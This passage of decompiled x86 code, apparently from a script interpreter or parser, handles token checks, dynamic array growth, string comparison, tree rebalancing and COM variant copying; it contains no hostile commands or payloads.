																	if(_t1194 == 0x4a) {
																		L459:
																		_v212 = _v212 + 5;
																		goto L142;
																	}
																	__eflags = _t1194 - 0x49;
																	if(_t1194 == 0x49) {
																		goto L459;
																	}
																	_v212 = _v212 + 4;
																	goto L142;
																} else {
																	_t279 =  &_v212;
																	 *_t279 = _v212 + 2;
																	__eflags =  *_t279;
																	L142:
																	_t1195 = _v12;
																	_v200 = _v200 + 1;
																	__eflags = _t1195 - 0x30;
																	if(_t1195 >= 0x30) {
																		__eflags = _t1195 - 0x3f;
																		if(_t1195 <= 0x3f) {
																			_t1202 = _v20;
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				E00FD651E(_t1202);
																			}
																		}
																	}
																	__eflags = _v32;
																	_v40 = 0x1015a44;
																	if(_v32 > 0) {
																		_t1782 = 0;
																		__eflags = 0;
																		do {
																			_t1197 =  *(_v36 + _t1782 * 4);
																			__eflags = _t1197;
																			if(_t1197 != 0) {
																				E00FDC736(_t1197);
																			}
																			_t1782 = _t1782 + 1;
																			__eflags = _t1782 - _v32;
																		} while (_t1782 < _v32);
																		goto L144;
																	} else {
																		L144:
																		_push(_v36);
																		_v32 = 0;
																		E00FA10FC();
																		_t1200 = _v108 + 1;
																		_t1809 = _t1809 + 4;
																		_v108 = _t1200;
																		__eflags = _t1200 - _v136;
																		if(_t1200 <= _v136) {
																			L70:
																			_t1493 =  *(_v148 + 4);
																			_t1778 = _v212;
																			_v12 = _t1611 | 0xffffffff;
																			_v40 = 0x1015a44;
																			_v36 = 0;
																			_v32 = 0;
																			_v28 = 0;
																			_v104 = 0;
																			_t1738 =  *(_t1493 + _t1778 * 4);
																			_t1652 = _t1493 + _t1778 * 4;
																			_t1177 = 0;
																			_v10 = 0;
																			_v208 = 0;
																			__eflags =  *(_t1738 + 8);
																			if( *(_t1738 + 8) == 0) {
																				do {
																					goto L371;
																					L375:
																					_t1741 =  *_t1652;
																					__eflags =  *(_t1741 + 8);
																				} while ( *(_t1741 + 8) == 0);
																				_v212 = _t1778;
																			}
																			goto L71;
																		} else {
																			_t1393 = _v24;
																			goto L146;
																		}
																	}
																}
															}
															__eflags = _t1495 - 0x49;
															if(_t1495 != 0x49) {
																goto L382;
															}
															goto L381;
														}
														_t1746 = _v128;
														_t1660 = _v200;
														_t1204 = _t1177 | 0x00000200;
														__eflags =  *( *(_t1746 + _t1660 * 4));
														if( *( *(_t1746 + _t1660 * 4)) != 0) {
															_t1728 = _v176;
															_t1611 =  *(_v176 + _t1660 * 4);
															_t1207 = E00FEF4F5( *( *(_t1493 + _t1778 * 4)), E00FC24D9(_t1611), _t1204, 1);
															__eflags = _t1207;
															if(_t1207 == 0) {
																E00FEE724(_t1851, _a4, 0x79,  *((short*)( *((intOrPtr*)( *(_v148 + 4) + _t1778 * 4)) + 0xa)));
																E00FDB3F5(__eflags,  &_v32);
																E00F911A0( &_v56, _t1728, _t1778);
																goto L625;
															}
															_v212 = _t1778 + 2;
															goto L142;
														}
														_t1664 =  *((intOrPtr*)(_v176 + _v200 * 4));
														_t1785 = _t1204;
														_t1215 = _v212 + _v212 + _v212 + _v212;
														_v156 = _t1215;
														_t1748 =  *( *(_t1215 + _t1493));
														__eflags =  *0x1037f34; // 0x0
														if(__eflags == 0) {
															E00F94040(_t1748, _t1493, _t1664, 0x1037f24, _t1785, __eflags, _t1664, _t1785);
															goto L140;
														}
														_v204 = _t1664;
														__eflags =  *0x1037f3d; // 0x0
														if(__eflags != 0) {
															_t1507 =  *0x1037f38; // 0x0
															_t1406 =  *(_t1507 + 8);
														} else {
															_t1406 =  *0x1037f38; // 0x0
														}
														_t1219 = 0;
														_v208 = _t1406;
														__eflags =  *_t1406;
														if(__eflags == 0) {
															L94:
															_t1786 = _t1785 & 0x0000ff00;
															_push(0x20);
															_v160 = _t1785 & 0x0000ff00;
															_t1220 = E00FA14F7(_t1748, _t1785 & 0x0000ff00, __eflags);
															_t1826 = _t1809 + 4;
															__eflags = _t1220;
															if(__eflags == 0) {
																_t1407 = 0;
															} else {
																_t1786 = _t1220;
																 *(_t1786 + 8) = 8;
																 *(_t1786 + 4) = 0;
																_push( ~(0 | __eflags > 0x00000000) | 0x10);
																_t1265 = E00FA14F7(_t1748, _t1786, __eflags);
																 *_t1786 = _t1265;
																_push(4);
																 *_t1265 = 0;
																_t1266 = E00FA14F7(_t1748, _t1786, __eflags);
																_t1826 = _t1826 + 8;
																__eflags = _t1266;
																if(_t1266 == 0) {
																	_t1266 = 0;
																} else {
																	 *_t1266 = 1;
																}
																 *(_t1786 + 0xc) = _t1266;
																_t1407 = _t1786;
															}
															__eflags = _t1407 - _t1748;
															if(__eflags != 0) {
																_t1252 =  *(_t1407 + 0xc);
																__eflags =  *_t1252 - 1;
																if(__eflags > 0) {
																	 *_t1252 =  *_t1252 - 1;
																	 *(_t1407 + 4) = _t1748[1];
																	 *(_t1407 + 8) = _t1748[2];
																	 *_t1407 =  *_t1748;
																	_t1748 = _t1748[3];
																	 *(_t1407 + 0xc) = _t1748;
																	 *_t1748 =  *_t1748 + 1;
																} else {
																	_t1786 = _t1748[1];
																	_t222 = _t1786 + 1; // 0x1
																	_t1254 = _t222;
																	 *(_t1407 + 4) = _t1786;
																	__eflags =  *(_t1407 + 8) - _t1254;
																	if( *(_t1407 + 8) < _t1254) {
																		 *(_t1407 + 8) = E00FD653C(_t1254);
																		_t1256 =  *_t1407;
																		__eflags = _t1256;
																		if(__eflags != 0) {
																			_push(_t1256);
																			E00FA10FC();
																			_t1826 = _t1826 + 4;
																		}
																		_push( ~(0 | __eflags > 0x00000000) |  *(_t1407 + 8) * 0x00000002);
																		_t1259 = E00FA14F7(_t1748, _t1786, __eflags);
																		_t1826 = _t1826 + 4;
																		 *_t1407 = _t1259;
																		 *((short*)(_t1259 + _t1786 * 2)) = 0;
																	}
																	E00FA0D80( *_t1407,  *_t1748,  *(_t1407 + 4) +  *(_t1407 + 4) + 2);
																	_t1826 = _t1826 + 0xc;
																}
															}
															_push(0x10);
															 *((intOrPtr*)(_t1407 + 0x10)) = _v160;
															_t1222 = E00FA14F7(_t1748, _t1786, __eflags);
															_t1508 = 0;
															_t1809 = _t1826 + 4;
															__eflags = _t1222;
															if(_t1222 == 0) {
																L109:
																_t1223 = _v208;
																_t1750 = 0;
																 *((intOrPtr*)(_t1407 + 0x14)) = _t1508;
																 *(_t1407 + 0x1c) = 0;
																 *(_t1407 + 0x18) = 0;
																_t1787 =  *_t1223;
																__eflags = _t1787;
																if(_t1787 == 0) {
																	 *(_t1407 + 0x1c) = 0;
																	 *(_t1407 + 0x18) = 0;
																	L139:
																	 *_t1223 = _t1407;
																	goto L140;
																}
																__eflags =  *0x10395e4 & 0x00000001;
																if(__eflags == 0) {
																	 *0x10395e4 =  *0x10395e4 | 0x00000001;
																	E00FDB393(0x10395c4);
																	E00FA122A(__eflags, 0xfb5b32);
																	_t1809 = _t1809 + 4;
																}
																 *0x10395e0 = _t1750;
																 *0x10395dc = _t1750;
																_v112 = 0x10395c4;
																_v140 = 0x10395c4;
																while(1) {
																	_t1227 =  *(_t1407 + 4);
																	_t1665 =  *((intOrPtr*)(_t1787 + 4));
																	__eflags = _t1227 - _t1750;
																	if(_t1227 == _t1750) {
																		goto L431;
																	}
																	L113:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 == _t1750) {
																		L432:
																		__eflags = _t1227 - _t1750;
																		if(_t1227 != _t1750) {
																			L124:
																			_t257 = _t1787 + 0x1c; // 0x1c
																			_t1241 = _t257;
																			_v204 = _t1241;
																			_t1242 =  *_t1241;
																			__eflags = _t1242 - _t1750;
																			if(_t1242 != _t1750) {
																				_v160 = _t1242;
																				_t1243 = E00FD30CF(_t1242, _t1407);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1243;
																				if(_t1243 == 0) {
																					L446:
																					 *(_v140 + 0x1c) = _t1787;
																					_v140 = _t1787;
																					_t1787 =  *_v204;
																					while(1) {
																						_t1227 =  *(_t1407 + 4);
																						_t1665 =  *((intOrPtr*)(_t1787 + 4));
																						__eflags = _t1227 - _t1750;
																						if(_t1227 == _t1750) {
																							goto L431;
																						}
																						goto L113;
																					}
																				}
																				_t1245 = _v160;
																				 *_v204 =  *(_t1245 + 0x18);
																				 *(_t1245 + 0x18) = _t1787;
																				_t1787 = _t1245;
																				__eflags =  *(_t1245 + 0x1c) - _t1750;
																				if( *(_t1245 + 0x1c) == _t1750) {
																					goto L125;
																				}
																				_t1246 = _t1245 + 0x1c;
																				__eflags = _t1246;
																				_v204 = _t1246;
																				goto L446;
																			}
																			L125:
																			 *(_v140 + 0x1c) =  *(_t1787 + 0x18);
																			 *(_v112 + 0x18) =  *(_t1787 + 0x1c);
																			_t1231 =  *0x10395e0; // 0x0
																			_t1668 =  *((intOrPtr*)(_t1787 + 4));
																			 *(_t1787 + 0x18) = _t1231;
																			_t1510 =  *0x10395dc; // 0x35b0570
																			 *(_t1787 + 0x1c) = _t1510;
																			_t1232 =  *(_t1407 + 4);
																			__eflags = _t1232 - _t1750;
																			if(_t1232 == _t1750) {
																				__eflags = _t1668 - _t1750;
																				if(_t1668 != _t1750) {
																					L454:
																					 *(_t1407 + 0x18) =  *(_t1787 + 0x18);
																					 *(_t1407 + 0x1c) = _t1787;
																					 *(_t1787 + 0x18) = _t1750;
																					L138:
																					_t1223 = _v208;
																					goto L139;
																				}
																				L448:
																				__eflags = _t1232 - _t1750;
																				if(_t1232 != _t1750) {
																					L137:
																					_t1511 =  *0x10395dc; // 0x35b0570
																					 *(_t1407 + 0x1c) = _t1511;
																					 *(_t1407 + 0x18) = _t1787;
																					 *(_t1787 + 0x1c) = _t1750;
																					goto L138;
																				}
																				L127:
																				__eflags = _t1232 - _t1668;
																				if(_t1232 < _t1668) {
																					_t1235 = E00F9D470( *_t1407,  *_t1787, _t1668);
																					L135:
																					__eflags = _t1235 - _t1750;
																					if(__eflags < 0) {
																						goto L454;
																					}
																					if(__eflags <= 0) {
																						_t1407 = _t1787;
																						goto L138;
																					}
																					goto L137;
																				}
																				__eflags = _t1232 - _t1750;
																				if(_t1232 <= _t1750) {
																					L451:
																					_t1235 = 0;
																				} else {
																					_t1513 =  *_t1787;
																					_t1669 = _t1232;
																					_t1236 =  *_t1407;
																					while(1) {
																						__eflags =  *_t1236 -  *_t1513;
																						if(__eflags != 0) {
																							if(__eflags < 0) {
																								_t1235 = _t1236 | 0xffffffff;
																								_t1750 = 0;
																							} else {
																								_t1235 = 1;
																								_t1750 = 0;
																								__eflags = 0;
																							}
																							goto L135;
																						}
																						_t1236 = _t1236 + 2;
																						_t1513 = _t1513 + 2;
																						_t1669 = _t1669 - 1;
																						__eflags = _t1669;
																						if(_t1669 != 0) {
																							continue;
																						} else {
																							_t1750 = 0;
																							__eflags = 0;
																							goto L451;
																						}
																					}
																				}
																				goto L135;
																			}
																			__eflags = _t1668 - _t1750;
																			if(_t1668 == _t1750) {
																				goto L448;
																			}
																			goto L127;
																		}
																	}
																	__eflags = _t1227 - _t1665;
																	if(_t1227 < _t1665) {
																		_t1248 = E00F9D470( *_t1407,  *_t1787, _t1665);
																		L122:
																		__eflags = _t1248 - _t1750;
																		if(__eflags < 0) {
																			L438:
																			_t762 = _t1787 + 0x18; // 0x18
																			_t1228 = _t762;
																			_v204 = _t1228;
																			_t1229 =  *_t1228;
																			__eflags = _t1229 - _t1750;
																			if(_t1229 == _t1750) {
																				goto L125;
																			}
																			_v160 = _t1229;
																			_t1237 = E00FD30CF(_t1407, _t1229);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1237;
																			if(_t1237 == 0) {
																				L442:
																				 *(_v112 + 0x18) = _t1787;
																				_v112 = _t1787;
																				_t1787 =  *_v204;
																				_t1227 =  *(_t1407 + 4);
																				_t1665 =  *((intOrPtr*)(_t1787 + 4));
																				__eflags = _t1227 - _t1750;
																				if(_t1227 == _t1750) {
																					goto L431;
																				}
																				goto L113;
																			}
																			_t1239 = _v160;
																			 *_v204 =  *(_t1239 + 0x1c);
																			 *(_t1239 + 0x1c) = _t1787;
																			_t1787 = _t1239;
																			__eflags =  *(_t1239 + 0x18) - _t1750;
																			if( *(_t1239 + 0x18) == _t1750) {
																				goto L125;
																			}
																			_t1240 = _t1239 + 0x18;
																			__eflags = _t1240;
																			_v204 = _t1240;
																			goto L442;
																		}
																		if(__eflags <= 0) {
																			goto L125;
																		}
																		goto L124;
																	}
																	__eflags = _t1227 - _t1750;
																	if(_t1227 <= _t1750) {
																		L435:
																		_t1248 = 0;
																	} else {
																		_t1519 =  *_t1787;
																		_t1672 = _t1227;
																		_t1249 =  *_t1407;
																		while(1) {
																			__eflags =  *_t1249 -  *_t1519;
																			if(__eflags != 0) {
																				if(__eflags < 0) {
																					_t1248 = _t1249 | 0xffffffff;
																					_t1750 = 0;
																				} else {
																					_t1248 = 1;
																					_t1750 = 0;
																					__eflags = 0;
																				}
																				goto L122;
																			}
																			_t1249 = _t1249 + 2;
																			_t1519 = _t1519 + 2;
																			_t1672 = _t1672 - 1;
																			__eflags = _t1672;
																			if(_t1672 != 0) {
																				continue;
																			} else {
																				_t1750 = 0;
																				__eflags = 0;
																				goto L435;
																			}
																		}
																	}
																	goto L122;
																	L431:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 != _t1750) {
																		goto L438;
																	}
																	goto L432;
																}
															} else {
																_t1753 = _v204;
																_t1673 =  *((intOrPtr*)(_t1753 + 8));
																_t1788 = _t1222;
																_t232 = _t1673 - 1; // 0x46
																_t1250 = _t232;
																_v140 = _t1788;
																 *((intOrPtr*)(_t1788 + 8)) =  *((intOrPtr*)(_t1753 + 8));
																 *(_t1788 + 0xc) = 0;
																__eflags = _t1250 - 0xb;
																if(__eflags > 0) {
																	L108:
																	_t1508 = _v140;
																	goto L109;
																}
																switch( *((intOrPtr*)(_t1250 * 4 +  &M00F9A994))) {
																	case 0:
																		__eax =  *__edi;
																		goto L266;
																	case 1:
																		__eax =  *__edi;
																		 *__esi = __eax;
																		__ecx =  *(__edi + 4);
																		 *(__esi + 4) = __ecx;
																		goto L108;
																	case 2:
																		__fp0 =  *__edi;
																		 *__esi = __fp0;
																		goto L108;
																	case 3:
																		_push(0x10);
																		_t1251 = E00FA14F7(_t1753, _t1788, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1251;
																		if(_t1251 == 0) {
																			_t1251 = 0;
																		} else {
																			_t1520 =  *(_t1753 + 0xc);
																			 *_t1251 =  *_t1520;
																			 *((intOrPtr*)(_t1251 + 4)) =  *((intOrPtr*)(_t1520 + 4));
																			 *((intOrPtr*)(_t1251 + 8)) =  *((intOrPtr*)(_t1520 + 8));
																			_t1521 =  *(_t1520 + 0xc);
																			 *(_t1251 + 0xc) = _t1521;
																			 *_t1521 =  *_t1521 + 1;
																			__eflags =  *_t1521;
																		}
																		 *(_t1788 + 0xc) = _t1251;
																		goto L108;
																	case 4:
																		_push(0x214);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__edx = _v204;
																			__esi =  *__edx;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		__ecx = _v140;
																		 *__ecx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																		}
																		goto L108;
																	case 5:
																		__edx =  *__edi;
																		 *__esi = __edx;
																		goto L108;
																	case 6:
																		__eflags =  *__edi;
																		if(__eflags != 0) {
																			_push(0x10);
																			__eax = E00FA14F7(__edi, __esi, __eflags);
																			__esp = __esp + 4;
																			_push(__eax);
																			 *__esi = __eax;
																			__imp__#8();
																			__edx =  *__edi;
																			__eax =  *__esi;
																			_push(__edx);
																			_push(__eax);
																			__imp__#10();
																			__eflags = __eax;
																			if(__eax < 0) {
																				__ecx =  *__esi;
																				_push( *__esi);
																				__imp__#9();
																				__edx =  *__esi;
																				_push(__edx);
																				__eax = E00FA10FC();
																				__esp = __esp + 4;
																				 *__esi = 0;
																			}
																		}
																		goto L108;
																	case 7:
																		 *__esi =  *__edi;
																		goto L108;
																	case 8:
																		_push(0x18);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L429;
																		}
																		__ecx =  *__edi;
																		__eax = E00FDB82F(__eax,  *__edi);
																		goto L266;
																	case 9:
																		_push(8);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		 *__esi = __eax;
																		__edx =  *__edi;
																		__ecx =  *( *__edi);
																		 *__eax =  *( *__edi);
																		__edx =  *__esi;
																		__eax =  *( *__esi);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E00FA14F7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__esi;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *__eax = 0;
																		} else {
																			_push(__eax);
																			__eax = E00FA14F7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *( *__esi + 4) = __eax;
																			__esi =  *__esi;
																			__edx =  *__esi;
																			__eax =  *__edi;
																			__ecx =  *( *__edi + 4);
																			__esp = __esp + 4;
																			__edx =  *(__esi + 4);
																			__eax = E00FA0D80( *(__esi + 4),  *( *__edi + 4),  *__esi);
																		}
																		goto L108;
																	case 0xa:
																		_push(0x14);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L429:
																			__eax = 0;
																			L266:
																			 *__esi = __eax;
																			goto L108;
																		}
																		__ecx =  *__edi;
																		__eax = E0100082A(__eax,  *__edi);
																		goto L266;
																}
															}
														} else {
															__eflags =  *0x10395e4 & 0x00000001;
															_v161 = 0;
															if(__eflags == 0) {
																 *0x10395e4 =  *0x10395e4 | 0x00000001;
																E00FDB393(0x10395c4);
																E00FA122A(__eflags, 0xfb5b32);
																_t1809 = _t1809 + 4;
																_t1219 = 0;
															}
															 *0x10395e0 = _t1219;
															 *0x10395dc = _t1219;
															_t1269 = 0x10395c4;
															_v112 = 0x10395c4;
															while(1) {
																_v140 = _t1269;
																while(1) {
																	L80:
																	_t1270 = _t1748[1];
																	_t1534 =  *_t1406;
																	_t1684 =  *(_t1534 + 4);
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		goto L386;
																	}
																	L81:
																	__eflags = _t1684;
																	if(_t1684 == 0) {
																		L387:
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			L92:
																			_t1283 =  *( *_t1406 + 0x1c);
																			__eflags = _t1283;
																			if(_t1283 != 0) {
																				_t1284 = E00FD30CF(_t1283, _t1748);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1284;
																				if(_t1284 == 0) {
																					L399:
																					 *((intOrPtr*)(_v112 + 0x1c)) =  *_t1406;
																					_t1286 =  *_t1406;
																					_v112 = _t1286;
																					 *_t1406 =  *(_t1286 + 0x1c);
																					L80:
																					_t1270 = _t1748[1];
																					_t1534 =  *_t1406;
																					_t1684 =  *(_t1534 + 4);
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L386;
																					}
																					goto L81;
																				}
																				_t1288 =  *( *_t1406 + 0x1c);
																				 *( *_t1406 + 0x1c) =  *(_t1288 + 0x18);
																				 *(_t1288 + 0x18) =  *_t1406;
																				 *_t1406 = _t1288;
																				__eflags =  *(_t1288 + 0x1c);
																				if( *(_t1288 + 0x1c) == 0) {
																					goto L93;
																				}
																				goto L399;
																			}
																			L93:
																			__eflags = _v161;
																			 *(_v112 + 0x1c) =  *( *_t1406 + 0x18);
																			 *(_v140 + 0x18) =  *( *_t1406 + 0x1c);
																			_t1537 =  *0x10395e0; // 0x0
																			 *( *_t1406 + 0x18) = _t1537;
																			_t1276 =  *0x10395dc; // 0x35b0570
																			 *( *_t1406 + 0x1c) = _t1276;
																			if(__eflags != 0) {
																				_t1408 =  *_t1406;
																				__eflags =  *_t1406;
																				if(__eflags == 0) {
																					goto L94;
																				}
																				E00F990D0( *((intOrPtr*)(_t1408 + 0x14)), _v204, _v204);
																				goto L140;
																			}
																			goto L94;
																		}
																	}
																	__eflags = _t1270 - _t1684;
																	if(_t1270 < _t1684) {
																		_t1290 = E00F9D470( *_t1748,  *_t1534, _t1684);
																		L90:
																		__eflags = _t1290;
																		if(__eflags < 0) {
																			L393:
																			_t1272 =  *( *_t1406 + 0x18);
																			__eflags = _t1272;
																			if(_t1272 == 0) {
																				goto L93;
																			}
																			_t1278 = E00FD30CF(_t1748, _t1272);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1278;
																			if(_t1278 == 0) {
																				L396:
																				 *(_v140 + 0x18) =  *_t1406;
																				_t1269 =  *_t1406;
																				 *_t1406 =  *(_t1269 + 0x18);
																				_v140 = _t1269;
																				continue;
																			}
																			_t1281 =  *( *_t1406 + 0x18);
																			 *( *_t1406 + 0x18) =  *(_t1281 + 0x1c);
																			 *(_t1281 + 0x1c) =  *_t1406;
																			 *_t1406 = _t1281;
																			__eflags =  *(_t1281 + 0x18);
																			if( *(_t1281 + 0x18) == 0) {
																				goto L93;
																			}
																			goto L396;
																		}
																		if(__eflags <= 0) {
																			_v161 = 1;
																			goto L93;
																		}
																		goto L92;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		L390:
																		_t1290 = 0;
																	} else {
																		_t1545 =  *_t1534;
																		_t1693 = _t1270;
																		_t1291 =  *_t1748;
																		while(1) {
																			__eflags =  *_t1291 -  *_t1545;
																			if(__eflags != 0) {
																				break;
																			}
																			_t1291 = _t1291 + 2;
																			_t1545 = _t1545 + 2;
																			_t1693 = _t1693 - 1;
																			__eflags = _t1693;
																			if(_t1693 != 0) {
																				continue;
																			} else {
																				_t1406 = _v208;
																				goto L390;
																			}
																		}
																		_t1406 = _v208;
																		if(__eflags < 0) {
																			_t1290 = _t1291 | 0xffffffff;
																		} else {
																			_t1290 = 1;
																		}
																	}
																	goto L90;
																	L386:
																	__eflags = _t1684;
																	if(_t1684 != 0) {
																		goto L393;
																	}
																	goto L387;
																}
															}
														}
														L371:
														_t1740 =  *( *_t1652);
														__eflags = _t1740 - 0x24;
														if(_t1740 == 0x24) {
															L374:
															_t1778 = _t1778 + 1;
															_t1652 = _t1652 + 4;
															__eflags = _t1652;
															goto L375;
														}
														__eflags = _t1740 - 0x1e;
														if(_t1740 != 0x1e) {
															goto L375;
														}
														_v208 = 0x100;
														_t1177 = _v208;
														goto L374;
													}
												} else {
													_v212 = 3;
													_v108 = _t1444;
													while(1) {
														__eflags = _t1611 - _v208;
														if(_t1611 >= _v208) {
															goto L57;
														}
														_v116 = _v116 + 1;
														_t1308 =  *(_v148 + 4) + _v212 * 4;
														_t1559 =  *_t1308;
														_t1728 = 0;
														_t1411 = 0;
														__eflags =  *(_t1559 + 8);
														if( *(_t1559 + 8) == 0) {
															do {
																_t1561 =  *((intOrPtr*)( *_t1308));
																__eflags = _t1561 - 0x24;
																if(_t1561 != 0x24) {
																	__eflags = _t1561 - 0x1e;
																	if(_t1561 != 0x1e) {
																		_push(0xffffffff);
																		_push(0x91);
																		L623:
																		_push(_a4);
																		goto L624;
																	}
																	_t1728 = 0x100;
																	goto L301;
																}
																_t1411 = 1;
																L301:
																_t1562 =  *((intOrPtr*)(_t1308 + 4));
																_v212 = _v212 + 1;
																_t1308 = _t1308 + 4;
																__eflags =  *((short*)(_t1562 + 8));
															} while ( *((short*)(_t1562 + 8)) == 0);
														}
														_t1697 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1611 * 4));
														__eflags =  *((short*)(_t1697 + 8)) - 0x33;
														if( *((short*)(_t1697 + 8)) != 0x33) {
															_t1411 = 0;
															__eflags = 0;
														}
														_t1791 = _v124;
														_t1310 = _v120;
														__eflags = _t1791 - _t1310;
														if(__eflags == 0) {
															_t1311 = _t1310 + _t1310;
															__eflags = _t1311 - 4;
															if(__eflags < 0) {
																_t1311 = 4;
															}
															_v120 = _t1311;
															_push( ~(0 | __eflags > 0x00000000) | _t1311 * 0x00000004);
															_v156 = E00FA14F7(_t1728, _t1791, __eflags);
															E00FA0D80(_t1313, _v128, _t1791 * 4);
															_push(_v128);
															E00FA10FC();
															_t1809 = _t1809 + 0x14;
															_v128 = _v156;
														}
														_push(1);
														_t1317 = E00FA14F7(_t1728, _t1791, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1317;
														if(_t1317 == 0) {
															_t1317 = 0;
														} else {
															 *_t1317 = _t1411;
														}
														 *(_v128 + _t1791 * 4) = _t1317;
														_t1792 = _t1791 + 1;
														_v124 = _t1791 + 1;
														__eflags = _t1411;
														if(_t1411 != 0) {
															_t1570 = _v144;
															_t1319 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4));
															__eflags =  *((short*)(_t1319 + 8)) - 0x33;
															if( *((short*)(_t1319 + 8)) != 0x33) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4)) + 0xa)));
																_push(0x91);
																_push(_a4);
																goto L624;
															}
															_t1573 = 0;
															_t1322 = E00F9C510(0,  *_t1319,  &_v200,  &_v204);
															__eflags = _t1322;
															if(_t1322 == 0) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
																_push(0x79);
																_push(_a4);
																goto L624;
															}
															__eflags = _v204 & 0x00000100;
															if((_v204 & 0x00000100) == 0) {
																L309:
																_t1325 = _v200;
																_t1728 = 1;
																_v144 = _v144 + 1;
																_v212 = _v212 + 1;
																__eflags =  *((intOrPtr*)(_t1325 + 8)) - 5;
																if( *((intOrPtr*)(_t1325 + 8)) != 5) {
																	L313:
																	E00F99190(_t1728,  &_v196);
																	_v188 = 6;
																	_v196 = _v200;
																	E00F9BC60(_t1411, _t1573, _t1728,  &_v180,  &_v196);
																	_t1412 = _v212;
																	goto L51;
																}
																_t1573 = _a8;
																_t1710 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4));
																__eflags =  *((short*)(_t1710 + 8)) - 0x4e;
																if( *((short*)(_t1710 + 8)) != 0x4e) {
																	goto L313;
																}
																_t1341 = E00F9C730( &_v144, _t1573, _t1851, _a4,  &_v200, 0);
																__eflags = _t1341;
																if(_t1341 == 0) {
																	goto L313;
																}
																E00F99190(1,  &_v196);
																E00FC0C87( &_v132);
																E00FA0B80( &_v180, 1);
																_t946 = 1;
																goto L264;
															}
															__eflags = _t1728 & 0x00000100;
															if((_t1728 & 0x00000100) != 0) {
																goto L309;
															}
															_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
															_push(0xb0);
															_push(_a4);
															goto L624;
														} else {
															_t1347 = _v184;
															__eflags = _t1347;
															if(_t1347 != 0) {
																E00FD651E(_t1347);
																_v188 = 0;
															}
															_t1349 = _v188;
															__eflags = _t1349 - 8;
															if(_t1349 == 8) {
																_t1350 = _v196;
																__eflags = _t1350;
																if(_t1350 != 0) {
																	__imp__#9(_t1350);
																	_push(_v200);
																	E00FA10FC();
																	_t1809 = _t1809 + 4;
																}
															} else {
																__eflags = _t1349 - 0xa;
																if(_t1349 == 0xa) {
																	_t1369 = _v196;
																	__eflags = _t1369;
																	if(_t1369 != 0) {
																		E00FD30B0(_t1369);
																	}
																} else {
																	__eflags = _t1349 - 5;
																	if(_t1349 == 5) {
																		E00F9E470( &_v196, _t1792);
																	} else {
																		__eflags = _t1349 - 0xb;
																		if(_t1349 == 0xb) {
																			_push( *(_v196 + 4));
																			E00FA10FC();
																			_push(_v196);
																			E00FA10FC();
																			_t1809 = _t1809 + 8;
																		} else {
																			__eflags = _t1349 - 0xc;
																			if(_t1349 == 0xc) {
																				_t1376 = _v196;
																				__eflags = _t1376;
																				if(_t1376 != 0) {
																					E00FDB350(_t1376);
																				}
																			}
																		}
																	}
																}
															}
															_t1799 = _v172;
															_t1351 = _v168;
															_v188 = 1;
															_v196 = 0;
															__eflags = _t1799 - _t1351;
															if(__eflags == 0) {
																_t1352 = _t1351 + _t1351;
																__eflags = _t1352 - 4;
																if(__eflags < 0) {
																	_t1352 = 4;
																}
																_v168 = _t1352;
																_push( ~(0 | __eflags > 0x00000000) | _t1352 * 0x00000004);
																_t1354 = E00FA14F7(_t1728, _t1799, __eflags);
																_t1413 = _v176;
																_t1755 = _t1354;
																E00FA0D80(_t1755, _t1413, _t1799 * 4);
																_push(_t1413);
																E00FA10FC();
																_t1809 = _t1809 + 0x14;
																_v176 = _t1755;
															}
															_t1728 = _v176;
															_push(0x10);
															_t1358 = E00FA14F7(_t1728, _t1799, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1358;
															if(_t1358 == 0) {
																_t1359 = 0;
																L49:
																_t1412 = _v208;
																 *(_t1728 + _t1799 * 4) = _t1359;
																_v172 = _t1799 + 1;
																_t1361 = E00F9A9D0(_a4, _t1851, _a8,  &_v144,  *((intOrPtr*)(_t1728 + (_t1799 + 1) * 4 - 4)), _t1412); // executed
																__eflags = _t1361;
																if(_t1361 != 0) {
																	L625:
																	E00F99190(_t1728,  &_v196);
																	E00FC0C87( &_v132);
																	E00FA0B80( &_v180, _t1728);
																	_t946 = 1;
																	goto L264;
																} else {
																	_t1362 = _v212;
																	_t1717 =  *((intOrPtr*)( *(_v148 + 4) + 4 + _t1362 * 4));
